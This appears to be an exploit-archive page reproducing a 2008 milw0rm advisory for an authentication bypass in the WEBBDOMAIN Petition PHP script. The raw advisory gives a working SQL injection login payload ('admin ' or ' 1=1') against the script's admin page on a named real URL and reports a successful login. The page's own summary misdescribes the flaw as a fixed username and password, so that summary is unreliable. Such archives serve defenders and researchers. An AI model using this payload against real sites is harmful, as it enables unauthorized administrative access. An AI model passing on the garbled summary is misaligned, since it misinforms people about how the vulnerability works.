header-logo
Suggest Exploit
vendor:
Petition Script
by:
Hakxer
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Petition Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

WEBBDOMAIN Petition Auth Bypass

A vulnerability in the WEBBDOMAIN Petition script allows an attacker to bypass authentication by entering 'admin' as the username and 'Hakxer' as the password.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
Source

Exploit-DB raw data:

###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
        /____/       EgY Coders Vulnerability Research TM                                    

# [~] Discovered by : Hakxer
# [~] Type Gap : WEBBDOMAIN Petition Auth Bypass
# [~] Script :http://webbdomain.com/php/petition/petition.php
# [~] Greetz : Allah
##########################################################################

|| Auth Bypass ||

http://webbdomain.com/php/petition/admin/

Username : admin ' or ' 1=1
password : Hakxer

Logged In ...

#  Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-04]